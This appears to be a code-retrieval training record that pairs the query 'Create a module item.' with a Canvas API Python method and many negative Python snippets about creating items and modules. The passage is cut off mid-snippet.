[ "0.6879843", "0.6871387", "0.6860534", "0.6821481", "0.6766025", "0.67570114", "0.6722933", "0.66447437", "0.6609891", "0.65726656", "0.6570282", "0.65633136", "0.6554844", "0.6482532", "0.6472665", "0.64377874", "0.6428559", "0.6427989", "0.63757336", "0.6357774", "0.63287115", "0.6279073", "0.627079", "0.62071586", "0.61873275", "0.60596913", "0.5997983", "0.5917516", "0.5905285", "0.5898481", "0.5859372", "0.58418256", "0.58359516", "0.5818848", "0.58050734", "0.5722754", "0.5722754", "0.5656766", "0.56442", "0.56397057", "0.56397057", "0.5633216", "0.5618579", "0.55983824", "0.5581739", "0.5581739", "0.55573875", "0.55573714", "0.55428886", "0.5534347", "0.5507896", "0.54758894", "0.54758894", "0.5471618", "0.54697347", "0.54694766", "0.54670966", "0.5462047", "0.54576105", "0.54424226", "0.5432521", "0.5393374", "0.5391384", "0.53845376", "0.53747326", "0.53693295", "0.5367425", "0.53660166", "0.5345747", "0.5344487", "0.53332794", "0.53249484", "0.53249305", "0.53240865", "0.5321835", "0.53210294", "0.53168565", "0.5313229", "0.53077155", "0.5306414", "0.5305692", "0.52984434", "0.5296285", "0.52954805", "0.5290965", "0.5290016", "0.52835226", "0.5282542", "0.5281662", "0.52752644", "0.52554893", "0.52527046", "0.5248542", "0.5239233", "0.52322066", "0.5230776", "0.52274984", "0.522059", "0.5219202", "0.5219202" ]
0.6043972
26
Create a module item.
def create_module_item(self, module_item, **kwargs): unrequired_types = ["ExternalUrl", "Page", "SubHeader"] if isinstance(module_item, dict) and "type" in module_item: # content_id is not required for unrequired_types if module_item["type"] in unrequired_types or "content_id" in module_item: kwargs["module_item"] = module_item else: raise RequiredFieldMissing( "Dictionary with key 'content_id' is required." ) else: raise RequiredFieldMissing("Dictionary with key 'type' is required.") response = self._requester.request( "POST", "courses/{}/modules/{}/items".format(self.course_id, self.id), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_item(request):\r\n usage_key = UsageKey.from_string(request.json['parent_locator'])\r\n category = request.json['category']\r\n\r\n display_name = request.json.get('display_name')\r\n\r\n if not has_course_access(request.user, usage_key.course_key):\r\n raise PermissionDenied()\r\n\r\n parent = get_modulestore(category).get_item(usage_key)\r\n dest_usage_key = usage_key.replace(category=category, name=uuid4().hex)\r\n\r\n # get the metadata, display_name, and definition from the request\r\n metadata = {}\r\n data = None\r\n template_id = request.json.get('boilerplate')\r\n if template_id:\r\n clz = parent.runtime.load_block_type(category)\r\n if clz is not None:\r\n template = clz.get_template(template_id)\r\n if template is not None:\r\n metadata = template.get('metadata', {})\r\n data = template.get('data')\r\n\r\n if display_name is not None:\r\n metadata['display_name'] = display_name\r\n\r\n get_modulestore(category).create_and_save_xmodule(\r\n dest_usage_key,\r\n definition_data=data,\r\n metadata=metadata,\r\n system=parent.runtime,\r\n )\r\n\r\n # TODO replace w/ nicer accessor\r\n if not 'detached' in parent.runtime.load_block_type(category)._class_tags:\r\n parent.children.append(dest_usage_key)\r\n get_modulestore(parent.location).update_item(parent, request.user.id)\r\n\r\n return JsonResponse({\"locator\": unicode(dest_usage_key), \"courseKey\": unicode(dest_usage_key.course_key)})", "def _create_module(self, rootdir):\n name = 'module_' + rootdir.get_name()\n moduleobj = Module(name, rootdir)\n rootdir.set_module(moduleobj)\n self._modules[name] = moduleobj", "def create_module(cls, *args, **kwargs): # real signature unknown\n pass", "def create_module(cls, *args, **kwargs): # real signature unknown\n pass", "def create_item(self, user: User, **kwargs) -> None:", "def create_module(self, body: list, **kwargs):\n return ast.Module(body=body)", "def add_item(self):\n item = LibGen.create_item()\n if not self.item_exists(item.call_number):\n self.item_list[item.call_number] = item\n print(f\"Item({item.call_number}) bas been added.\")\n else:\n print(\"This item already exists.\")", "def createItem(name, description, category_id, image, user_id):\n i = Item(name=name, description=description, category_id=category_id,\n image=image, user_id=user_id, pub_date=datetime.utcnow())\n db_session.add(i)\n db_session.commit()\n return i", "def _createModuleObj(self):\n raise NotImplementedError(\"Implement in derived class.\")", "def add_item(self):\n item = models.Item(item_name=self.test_item,\n list_id=1,\n description=self.test_item_desc)\n item.add()", "def create_work_item(self):", "def _create_item(self, parent_location, category, display_name, **kwargs):\n return ItemFactory.create(\n parent_location=parent_location,\n category=category,\n display_name=display_name,\n publish_item=False,\n user_id=self.user.id,\n **kwargs\n )", "def test_create_item(self):\n item = self.item\n\n self.assertTrue(isinstance(item, Item))\n self.assertEqual(item.name, \"Test Item\")", "def _create_item(self, item_id: str, data: dict) -> Pipeline:\n return Pipeline(id=item_id, **data)", "def _create_module(name):\n module = new.module(name)\n sys.modules[name] = module\n return module", "def test_create_module_invalid(self):\n payload = {'name': ''}\n res = self.client.post(MODULES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def _create_item(self, category, name, data, metadata, parent_category, parent_name, draft=True, split=True):\r\n location = self.old_course_key.make_usage_key(category, name)\r\n if not draft or category in DIRECT_ONLY_CATEGORIES:\r\n mongo = self.old_mongo\r\n else:\r\n mongo = self.draft_mongo\r\n mongo.create_and_save_xmodule(location, data, metadata, self.runtime)\r\n if isinstance(data, basestring):\r\n fields = {'data': data}\r\n else:\r\n fields = data.copy()\r\n fields.update(metadata)\r\n if parent_name:\r\n # add child to parent in mongo\r\n parent_location = self.old_course_key.make_usage_key(parent_category, parent_name)\r\n if not draft or parent_category in DIRECT_ONLY_CATEGORIES:\r\n mongo = self.old_mongo\r\n else:\r\n mongo = self.draft_mongo\r\n parent = mongo.get_item(parent_location)\r\n parent.children.append(location)\r\n mongo.update_item(parent, self.userid)\r\n # create pointer for split\r\n course_or_parent_locator = BlockUsageLocator(\r\n course_key=self.split_course_key,\r\n block_type=parent_category,\r\n block_id=parent_name\r\n )\r\n else:\r\n course_or_parent_locator = self.split_course_key\r\n if split:\r\n self.split_mongo.create_item(course_or_parent_locator, category, self.userid, block_id=name, fields=fields)", "def create_item():\n #if not request.json:\n # abort(400)\n parser = reqparse.RequestParser()\n parser.add_argument('item_code', type=int, required=False, help=\"Item code missing\")\n parser.add_argument('item_name', type=str, required=True, help=\"Item name missing\")\n parser.add_argument('size', type=str, required=True, help=\"Size missing\")\n parser.add_argument('color', type=str, required=True, help=\"Color missing\")\n parser.add_argument('quality', type=str, required=True, help=\"Quality missing\")\n parser.add_argument('username', type=str, required=True, help=\"Username missing\")\n args = parser.parse_args(strict=True)\n user_code = get_user_code(args['username'])\n if user_code is None:\n return make_response(jsonify({'error': 'User does not exists'}), 400)\n new_item = dict(\n item_code = args['item_code'],\n item_name = args['item_name'],\n size_code = get_size_code( args['size']),\n color_code = get_color_code( args['color']),\n quality_code = get_quality_code( args['quality'])\n )\n try:\n u = models.Items(**new_item)\n db.session.add(u)\n db.session.commit()\n except sqlalchemy.exc.IntegrityError, e:\n return make_response(jsonify({'error': 'item code already exists.'}), 400)\n\n return make_response(jsonify({'success': True}))", "def create_item_command(cog_href: str, destination: str) -> None:\n item = stac.create_item(cog_href)\n\n item.save_object(dest_href=destination)", "def createItem(self, parentFolderId, name, description) :\n path = 'item'\n params = { 'folderId': parentFolderId,\n 'name': name,\n 'description': description }\n obj = self.sendRestRequest('POST', path, params)\n if '_id' in obj :\n return obj['_id']\n else :\n raise Exception('Error, expected the returned item object to have an \"_id\" field')", "def edit(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def hfp_firmware_pack_item_add(handle, org_dn, hfp_name, hw_vendor, hw_model,\r\n type, version):\r\n\r\n from ucsmsdk.mometa.firmware.FirmwarePackItem import FirmwarePackItem\r\n\r\n dn = org_dn + \"/fw-host-pack-\" + hfp_name\r\n obj = handle.query_dn(dn)\r\n if obj is None:\r\n raise ValueError(\"HFP '%s' does not exist\" % dn)\r\n\r\n mo = FirmwarePackItem(hw_vendor=hw_vendor,\r\n hw_model=hw_model,\r\n type=type,\r\n version=version)\r\n handle.add_mo(mo)\r\n handle.commit()\r\n\r\n return mo", "def newModule(name, swipl):\n if isinstance(name, str):\n name = Atom(name, swipl)\n\n return swipl.PL_new_module(name.handle)", "def createItem(name, category, price, user_id):\n try:\n description = wikipedia.summary(name)\n except wikipedia.exceptions.DisambiguationError as e:\n description = wikipedia.summary(name + \" \" + category.name)\n\n i = Item(name=name, description=description,\n category_id=category.id, price=price, user_id=user_id)\n session.add(i)\n session.commit()\n print 'Item \"' + name + '\" added.'\n return i", "def create(cls):\n return BasketItem(code=str(uuid.uuid4()))", "def create_item(world: World, item_id: str, x: int, y: int, *args):\n item_id = ITEMS[item_id]\n if item_id == \"coin\":\n item = Coin()\n elif item_id == \"star\":\n item = Star()\n else:\n item = DroppedItem(item_id)\n\n world.add_item(item, x * BLOCK_SIZE, y * BLOCK_SIZE)", "def create_modules(self):\n self.nmos = ptx(width=self.nmos_size,\n mults=self.nmos_mults,\n tx_type=\"nmos\")\n self.add_mod(self.nmos)\n\n self.pmos = ptx(width=self.pmos_size,\n mults=self.pmos_mults,\n tx_type=\"pmos\")\n self.add_mod(self.pmos)", "def create(self, item_type, uuid):\n return self.write.create(item_type, uuid)", "def create_item(self, obj):\n logger.info('ItemProduct adding item initiated')\n try:\n with Transaction().start(DBNAME, 1) as transaction:\n unit, = self.ProductUom.search([('name', '=', obj['units'])])\n template = self.ProductTemplate()\n try:\n if self.Product.search([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n except Exception:\n pass\n template.category = self.ProductCategory.search([('name', '=', obj['category'])])[-1]\n template.default_uom = unit\n template.purchase_uom = unit\n template.type = 'goods'\n rate = Decimal(obj['rate'])\n cost = rate / 2\n template.name = obj['name']\n template.list_price = Decimal(rate)\n template.cost_price = Decimal(cost)\n template.purchasable = True\n template.account_expense = self.accounts['expense']\n template.account_receivable = self.accounts['receivable']\n template.save()\n # transaction.cursor.commit()\n product = self.Product()\n product.template = template\n product.code = obj['id']\n product.description = 'Stock'\n product.save()\n transaction.cursor.commit()\n return True\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return False", "def test_create_module_successful(self):\n payload = {'name': 'Test Module'}\n self.client.post(MODULES_URL, payload)\n\n exists = Module.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertTrue(exists)", "def create_item(item: Item):\n coll_users = data_access.get_user_collection()\n coll_items = data_access.get_items_collection()\n\n if not item.users:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n \"Empty user list not allowed.\")\n\n if not item.content:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n \"No description / content given.\")\n\n for user_name in item.users:\n if coll_users.find_one({\"name\": user_name}) is None:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n f\"User {user_name} not exists in the user list.\")\n\n item_dict = item.dict()\n item_dict[\"item_id\"] = uuid.uuid4()\n\n tm_now = datetime.datetime.now().isoformat()\n item_dict[\"status_change_date\"] = tm_now\n\n coll_items.insert_one(item_dict)", "def createItem(self, item):\r\n try:\r\n self.feed_handler.createItem(item.link, item.title, item.descr,\r\n item.source, item.channelURL)\r\n self.feed_passed = self.feed_passed + 1\r\n except Exception, ex: \r\n # Remove comment for detailed information on feed item created\r\n #print ex\r\n pass", "def create_item(self, parent, block):\r\n li = util.etree.SubElement(parent, 'li')\r\n self.parser.parseBlocks(li, [block])", "def delete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def create(self):\n item = BasketItem.create()\n self._baskets[item.code] = item\n return item.code", "def _new_item(class_name=None):\n class_name = class_name or \"Folder\"\n return ElementTree.Element(\"Item\", attrib={ \"class\": class_name })", "def create_item():\n\n data = request.get_json()\n title = data.get(\"title\", None)\n description = data.get(\"description\", None)\n due_date = data.get(\"due_date\", None)\n list_id = data.get(\"list_id\", None)\n\n if title is None or list_id is None:\n return abort(400, description=f\"List ID and title cannot be null!\")\n\n list_to_append = ToDoList.query.filter(ToDoList.id == list_id).first()\n\n if list_to_append is None:\n return abort(404, description=f\"List ID {list_id} does not exist!\")\n\n if due_date is not None:\n try:\n due_date = datetime.datetime.strptime(due_date, DATE_FORMAT)\n except ValueError:\n return abort(400, description=f\"Date format must be YYYY-MM-DD HH:MM\")\n\n new_item = Task(\n title=title,\n description=description,\n status=\"pending\",\n due_date=due_date,\n list_id=list_id,\n )\n db.session.add(new_item)\n db.session.commit()\n\n return make_response(json.dumps(new_item.serialize()))", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def test_create_parented_item(self):\r\n locator = BlockUsageLocator(\r\n CourseLocator(org='testx', offering='GreekHero', branch='draft'),\r\n 'chapter', block_id='chapter2'\r\n )\r\n original = modulestore().get_item(locator)\r\n\r\n locator = BlockUsageLocator(\r\n CourseLocator(org='testx', offering='wonderful', branch='draft'), 'course', 'head23456'\r\n )\r\n premod_course = modulestore().get_course(locator.course_key)\r\n category = 'chapter'\r\n new_module = modulestore().create_item(\r\n locator, category, 'user123',\r\n fields={'display_name': 'new chapter'},\r\n definition_locator=original.definition_locator\r\n )\r\n # check that course version changed and course's previous is the other one\r\n self.assertNotEqual(new_module.location.version_guid, premod_course.location.version_guid)\r\n parent = modulestore().get_item(locator)\r\n self.assertIn(new_module.location.version_agnostic(), version_agnostic(parent.children))\r\n self.assertEqual(new_module.definition_locator.definition_id, original.definition_locator.definition_id)", "def create_items(sender, instance, **kwargs):\n if instance.item_id is None and instance.item is None:\n item = Item()\n if hasattr(instance, 'active'):\n item.active = getattr(instance, 'active')\n item.save()\n instance.item = item", "def create_eitem(self, new_document):\n eitem_cls = current_app_ils.eitem_record_cls\n eitem_json = self.json_data.get(\"_eitem\", None)\n if eitem_json:\n try:\n self._build_eitem_dict(eitem_json, new_document[\"pid\"])\n record_uuid = uuid.uuid4()\n with db.session.begin_nested():\n provider = EItemIdProvider.create(\n object_type=\"rec\",\n object_uuid=record_uuid,\n )\n\n eitem_json[\"pid\"] = provider.pid.pid_value\n self.created = eitem_cls.create(eitem_json, record_uuid)\n db.session.commit()\n return self.created\n except IlsValidationError as e:\n click.secho(\n \"Field: {}\".format(e.errors[0].res[\"field\"]), fg=\"red\"\n )\n click.secho(e.original_exception.message, fg=\"red\")\n db.session.rollback()\n raise e", "def new_module(name, doc=None):\n m = ModuleType(name, doc)\n m.__file__ = name + \".py\"\n sys.modules[name] = m\n return m", "def _createItem(self, rpcObject):\n item = ShowWidgetItem(rpcObject, self)\n return item", "def create_item(self, course_or_parent_loc, category, user_id=None, **kwargs):\r\n # find the store for the course\r\n course_id = getattr(course_or_parent_loc, 'course_key', course_or_parent_loc)\r\n store = self._get_modulestore_for_courseid(course_id)\r\n\r\n location = kwargs.pop('location', None)\r\n # invoke its create_item\r\n if isinstance(store, MongoModuleStore):\r\n block_id = kwargs.pop('block_id', getattr(location, 'name', uuid4().hex))\r\n parent_loc = course_or_parent_loc if isinstance(course_or_parent_loc, UsageKey) else None\r\n # must have a legitimate location, compute if appropriate\r\n if location is None:\r\n location = course_id.make_usage_key(category, block_id)\r\n # do the actual creation\r\n xblock = store.create_and_save_xmodule(location, **kwargs)\r\n # don't forget to attach to parent\r\n if parent_loc is not None and not 'detached' in xblock._class_tags:\r\n parent = store.get_item(parent_loc)\r\n parent.children.append(location)\r\n store.update_item(parent)\r\n elif isinstance(store, SplitMongoModuleStore):\r\n if not isinstance(course_or_parent_loc, (CourseLocator, BlockUsageLocator)):\r\n raise ValueError(u\"Cannot create a child of {} in split. Wrong repr.\".format(course_or_parent_loc))\r\n\r\n # split handles all the fields in one dict not separated by scope\r\n fields = kwargs.get('fields', {})\r\n fields.update(kwargs.pop('metadata', {}))\r\n fields.update(kwargs.pop('definition_data', {}))\r\n kwargs['fields'] = fields\r\n\r\n xblock = store.create_item(course_or_parent_loc, category, user_id, **kwargs)\r\n else:\r\n raise NotImplementedError(u\"Cannot create an item on store %s\" % store)\r\n\r\n return xblock", "def test_new_item(self):\n\n\t\titem_id = mock_item()[0]\n\t\tself.assertEqual(item_id, 1)", "def addToInventory(modList, item):\r\n modList.append(item)", "def newItem(self, nodeObject, icon):\n newItem = QtGui.QTreeWidgetItem()\n newItem.name = nodeObject.name\n newItem.label = nodeObject.label\n newItem.type = nodeObject.type\n newItem._object = nodeObject\n newItem._widget = MainTreeNode(self, newItem, icon)\n return newItem", "def newItem(\n self,\n name=UNSPECIFIED,\n availability=\"available\",\n quantity_amount=UNSPECIFIED,\n quantity_unit=UNSPECIFIED,\n resource_location_guid=UNSPECIFIED,\n extraParams={},\n ):\n import labstep.entities.resourceItem.repository as resourceItemRepository\n\n return resourceItemRepository.newResourceItem(\n self.__user__,\n name=name,\n resource_id=self.id,\n availability=availability,\n quantity_amount=quantity_amount,\n quantity_unit=quantity_unit,\n resource_location_guid=resource_location_guid,\n extraParams=extraParams,\n )", "def test_vault_create_new_vault_item(self):\n pass", "def create_menu_item(menu, label, func):\n item = wx.MenuItem(menu, -1, label)\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.Append(item)\n return item", "def add_item_definition():\n nonlocal guid\n nonlocal guid_stack\n nonlocal tree\n\n current_leaf_add(guid, {}, tree, guid_stack)\n guid_stack.append(guid)\n guid += 1\n\n # Wrapping this current_leaf_add is defensive coding so we don't\n # crash on malformed glm files.\n if len(full_token) > 1:\n # Do we have a clock/object or else an embedded configuration\n # object?\n if len(full_token) < 4:\n # Add the item definition.\n current_leaf_add(full_token[0], full_token[-2], tree,\n guid_stack)\n elif len(full_token) == 4:\n # We likely have an embedded/nested object.\n current_leaf_add('omfEmbeddedConfigObject',\n full_token[0] + ' ' +\n list_to_string(full_token), tree,\n guid_stack)\n else:\n # Something is wrong.\n raise UserWarning('Malformed GridLAB-D model. Token: {}'\n .format(' '.join(full_token)))\n\n # All done.", "def create():", "def create():", "def create(name):\n if not SchModule._ready:\n raise ValueError(\"not mounted\")\n\n schdir = SchModule.DIR.hpath(name)\n\n if path.exists(schdir):\n raise Exception(\"Already exists\")\n\n # create this scheme directory\n os.makedirs(schdir)\n\n with codecs.open(path.join(schdir, SchModule.DESCR), \"w\", \"utf8\") as f:\n timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n user = os.getenv(\"USER\", os.getenv(\"USERNAME\", \"Unknown\"))\n f.write(SchModule.DESCRTEMPLATE % locals())\n\n with codecs.open(path.join(schdir, SchModule.PYMODULE), \"w\", \"utf8\") as f:\n f.write(SchModule.PYMODULETEMPLATE)", "def create_module(module_dict: Dict[str, Any], nets: List[Net]) -> Module:\n m_data = module_dict['module']\n footprint = m_data[0].replace('\"', \"\")\n layer = convert_to_layers(get_dict_by_key(m_data, 'layer')['layer'])[0]\n coords = get_dict_by_key(m_data, 'at')['at']\n if len(coords) == 3 and \"B.\" in layer.name:\n coords[2] = (float(coords[2]) + 180) % 360\n coords[1] = str(-1*float(coords[1]))\n attr = get_dict_by_key(m_data, 'attr')\n smd: bool = True if (attr and attr['attr'] == 'smd') else False\n module_texts: List[FpText] = get_texts(m_data, 'fp_text')\n figures: List[Union[FpPoly, FpCircle, FpArc, FpLine]] = get_lines(m_data, 'fp_line')\n figures.extend(get_circles(m_data, 'fp_circle'))\n pads = get_pads(m_data, nets)\n ref = [text.text for text in module_texts if text.text_type ==TextType.reference][0]\n update_nets_with_pads(pads, nets, ref)\n figures.extend(get_polys(m_data, 'fp_poly'))\n figures.extend(get_arcs(m_data, 'fp_arc'))\n return Module(footprint=footprint, layer=layer, coords=coords, smd=smd,\n texts=module_texts, pads=pads, figures=figures, extrapads=list())", "def __load_item(item):\n\n itm = dtf.core.item.Item()\n\n itm.name = item.name\n itm.type = item.type\n\n itm.install_name = get_item_attrib(item, \"install_name\")\n itm.local_name = None\n itm.author = get_item_attrib(item, \"author\")\n itm.about = get_item_attrib(item, \"about\")\n itm.version = get_item_attrib(item, \"version\")\n\n return itm", "def _generate_item(ctx: Context, item_type, specification_path):\n # # check protocol buffer compiler is installed\n # res = shutil.which(\"protoc\")\n # if res is None:\n # print(\n # \"Please install protocol buffer first! See the following link: https://developers.google.com/protocol-buffers/\"\n # )\n # sys.exit(1)\n\n # Get existing items\n existing_id_list = getattr(ctx.agent_config, \"{}s\".format(item_type))\n existing_item_list = [public_id.name for public_id in existing_id_list]\n\n item_type_plural = item_type + \"s\"\n\n # Load item specification yaml file\n try:\n config_loader = ConfigLoader(\n \"protocol-specification_schema.json\", ProtocolSpecification\n )\n protocol_spec = config_loader.load_protocol_specification(\n open(specification_path)\n )\n except Exception as e:\n logger.exception(e)\n sys.exit(1)\n\n protocol_directory_path = os.path.join(\n ctx.cwd, item_type_plural, protocol_spec.name\n )\n\n # Check if we already have an item with the same name in the agent config\n logger.debug(\n \"{} already supported by the agent: {}\".format(\n item_type_plural, existing_item_list\n )\n )\n if protocol_spec.name in existing_item_list:\n logger.error(\n \"A {} with name '{}' already exists. Aborting...\".format(\n item_type, protocol_spec.name\n )\n )\n sys.exit(1)\n # Check if we already have a directory with the same name in the resource directory (e.g. protocols) of the agent's directory\n if os.path.exists(protocol_directory_path):\n logger.error(\n \"A directory with name '{}' already exists. Aborting...\".format(\n protocol_spec.name\n )\n )\n sys.exit(1)\n\n try:\n agent_name = ctx.agent_config.agent_name\n click.echo(\n \"Generating {} '{}' and adding it to the agent '{}'...\".format(\n item_type, protocol_spec.name, agent_name\n )\n )\n\n output_path = os.path.join(ctx.cwd, item_type_plural)\n protocol_generator = ProtocolGenerator(protocol_spec, output_path)\n protocol_generator.generate()\n\n # Add the item to the configurations\n logger.debug(\n \"Registering the {} into {}\".format(item_type, DEFAULT_AEA_CONFIG_FILE)\n )\n existing_id_list.add(PublicId(\"fetchai\", protocol_spec.name, DEFAULT_VERSION))\n ctx.agent_loader.dump(\n ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), \"w\")\n )\n except FileExistsError:\n logger.error(\n \"A {} with this name already exists. Please choose a different name and try again.\".format(\n item_type\n )\n )\n sys.exit(1)\n except Exception as e:\n logger.exception(e)\n shutil.rmtree(\n os.path.join(item_type_plural, protocol_spec.name), ignore_errors=True\n )\n sys.exit(1)", "def create(self):\n self.add_handlers({\"^T\": self.change_forms,\"^Q\": self.exit})\n self.add(npyscreen.TitleFixedText, name='Inventory items:', value='')\n self.inventory_mle = self.add(npyscreen.Pager,\n values=['Checking for plugins in the inventory, please wait...'])", "def create_and_add_item(self, word, samples):\n item = LibraryItem(word, samples)\n self.items.append(item)\n self.item_count += 1\n self.max_length = max(self.max_length, len(samples))", "def create_item_page():\n catagories = [c.name for c in Catagory.fetch_all()]\n return render_template('add_item.html', catagories=catagories, values={})", "def create_item():\n name = request.form['name']\n catagory = request.form['catagory']\n description = request.form['description']\n errors = form_errors(request.form)\n if errors:\n catagories = [c.name for c in Catagory.fetch_all()]\n values = {\n 'name': name, 'catagory': catagory, 'description': description\n }\n return render_template(\n 'add_item.html',\n catagories=catagories,\n values=values,\n errors=errors\n )\n Item.create(name, catagory_name=catagory, description=description)\n return redirect(url_for(\n 'read_item', catagory_name=catagory, item_name=name\n ))", "def add_new_item():\n\n lst = item_list()\n return render_template('index.html', sell_flag=1, items=lst)", "def add_item(self, item):\n if item.media_type == '':\n (has_guessed, media_type) = guess_type(item.get_name().lower())\n\n if has_guessed:\n if media_type is not None:\n item.media_type = media_type\n else:\n item.media_type = has_guessed\n else:\n item.media_type = 'application/octet-stream'\n\n if not item.get_id():\n # make chapter_, image_ and static_ configurable\n if isinstance(item, EpubHtml):\n item.id = 'chapter_%d' % self._id_html\n self._id_html += 1\n elif isinstance(item, EpubImage):\n item.id = 'image_%d' % self._id_image\n self._id_image += 1\n else:\n item.id = 'static_%d' % self._id_image\n self._id_image += 1\n\n item.book = self\n self.items.append(item)\n\n return item", "def _create_stack_item(container='gl-stack', children=None, viewers=None):\n children = [] if children is None else children\n viewers = [] if viewers is None else viewers\n\n return {\n 'id': str(uuid.uuid4()),\n 'container': container,\n 'children': children,\n 'viewers': viewers}", "def _save_item(request, usage_key, data=None, children=None, metadata=None, nullout=None,\r\n grader_type=None, publish=None):\r\n store = get_modulestore(usage_key)\r\n\r\n try:\r\n existing_item = store.get_item(usage_key)\r\n except ItemNotFoundError:\r\n if usage_key.category in CREATE_IF_NOT_FOUND:\r\n # New module at this location, for pages that are not pre-created.\r\n # Used for course info handouts.\r\n store.create_and_save_xmodule(usage_key)\r\n existing_item = store.get_item(usage_key)\r\n else:\r\n raise\r\n except InvalidLocationError:\r\n log.error(\"Can't find item by location.\")\r\n return JsonResponse({\"error\": \"Can't find item by location: \" + unicode(usage_key)}, 404)\r\n\r\n old_metadata = own_metadata(existing_item)\r\n\r\n if publish:\r\n if publish == 'make_private':\r\n _xmodule_recurse(\r\n existing_item,\r\n lambda i: modulestore().unpublish(i.location),\r\n ignore_exception=ItemNotFoundError\r\n )\r\n elif publish == 'create_draft':\r\n # This recursively clones the existing item location to a draft location (the draft is\r\n # implicit, because modulestore is a Draft modulestore)\r\n _xmodule_recurse(\r\n existing_item,\r\n lambda i: modulestore().convert_to_draft(i.location),\r\n ignore_exception=DuplicateItemError\r\n )\r\n\r\n if data:\r\n # TODO Allow any scope.content fields not just \"data\" (exactly like the get below this)\r\n existing_item.data = data\r\n else:\r\n data = existing_item.get_explicitly_set_fields_by_scope(Scope.content)\r\n\r\n if children is not None:\r\n children_usage_keys = [\r\n UsageKey.from_string(child)\r\n for child\r\n in children\r\n ]\r\n existing_item.children = children_usage_keys\r\n\r\n # also commit any metadata which might have been passed along\r\n if nullout is not None or metadata is not None:\r\n # the postback is not the complete metadata, as there's system metadata which is\r\n # not presented to the end-user for editing. So let's use the original (existing_item) and\r\n # 'apply' the submitted metadata, so we don't end up deleting system metadata.\r\n if nullout is not None:\r\n for metadata_key in nullout:\r\n setattr(existing_item, metadata_key, None)\r\n\r\n # update existing metadata with submitted metadata (which can be partial)\r\n # IMPORTANT NOTE: if the client passed 'null' (None) for a piece of metadata that means 'remove it'. If\r\n # the intent is to make it None, use the nullout field\r\n if metadata is not None:\r\n for metadata_key, value in metadata.items():\r\n field = existing_item.fields[metadata_key]\r\n\r\n if value is None:\r\n field.delete_from(existing_item)\r\n else:\r\n try:\r\n value = field.from_json(value)\r\n except ValueError:\r\n return JsonResponse({\"error\": \"Invalid data\"}, 400)\r\n field.write_to(existing_item, value)\r\n\r\n if existing_item.category == 'video':\r\n manage_video_subtitles_save(existing_item, request.user, old_metadata, generate_translation=True)\r\n\r\n # commit to datastore\r\n store.update_item(existing_item, request.user.id)\r\n\r\n result = {\r\n 'id': unicode(usage_key),\r\n 'data': data,\r\n 'metadata': own_metadata(existing_item)\r\n }\r\n\r\n if grader_type is not None:\r\n result.update(CourseGradingModel.update_section_grader_type(existing_item, grader_type, request.user))\r\n\r\n # Make public after updating the xblock, in case the caller asked\r\n # for both an update and a publish.\r\n if publish and publish == 'make_public':\r\n def _publish(block):\r\n # This is super gross, but prevents us from publishing something that\r\n # we shouldn't. Ideally, all modulestores would have a consistant\r\n # interface for publishing. However, as of now, only the DraftMongoModulestore\r\n # does, so we have to check for the attribute explicitly.\r\n store = get_modulestore(block.location)\r\n store.publish(block.location, request.user.id)\r\n\r\n _xmodule_recurse(\r\n existing_item,\r\n _publish\r\n )\r\n\r\n # Note that children aren't being returned until we have a use case.\r\n return JsonResponse(result)", "def _create_node(self, item: Item) -> Dict[str, Any]:\n node = {'text': item.title,\n 'item-id': item.id,\n 'nodes': []}\n icon = self.icon_name(item)\n if icon:\n node['icon'] = 'glyphicon glyphicon-{}'.format(icon)\n node['item_title'] = item.title\n node['item_type'] = item.type\n node['item_note'] = item.note\n node['node_type'] = item.__class__.__name__.lower()\n if isinstance(item, Item):\n meta = self._node_metadata(item)\n creators = item.creators\n if meta is not None:\n node['metadata'] = meta\n res = self._item_mapper.get_resource_name(item)\n if res is None:\n res = self._find_child_resource(item, self.PDF_EXT_REGEXP)\n if res is None:\n res = self._find_child_name(item, self.PDF_FULL_REGEXP)\n if res is not None:\n node['resource'] = res\n if creators is not None:\n if meta is None:\n meta = []\n node['metadata'] = meta\n meta.append(('Creators', ', '.join(map(str, creators))))\n if meta is not None:\n meta.sort()\n return node", "def create_menu_item(\n self,\n menu_name: str,\n item_name: str,\n callback: Callable | None = None,\n shortcut: str | None = None,\n ) -> None:\n self._widget._mgui_create_menu_item(menu_name, item_name, callback, shortcut)", "def _createModuleObj(self):\n ModuleInitialCondition.__init__(self)", "def addModulesToList(self):\n\n existing = self.getExistingModules()\n\n for module in self.modulesToAdd:\n if module not in existing:\n modName = cmds.getAttr(module + \".moduleName\")\n\n # add to listWIdget\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n item = QtWidgets.QListWidgetItem(modName)\n item.setData(QtCore.Qt.UserRole, [module, characterNode])\n 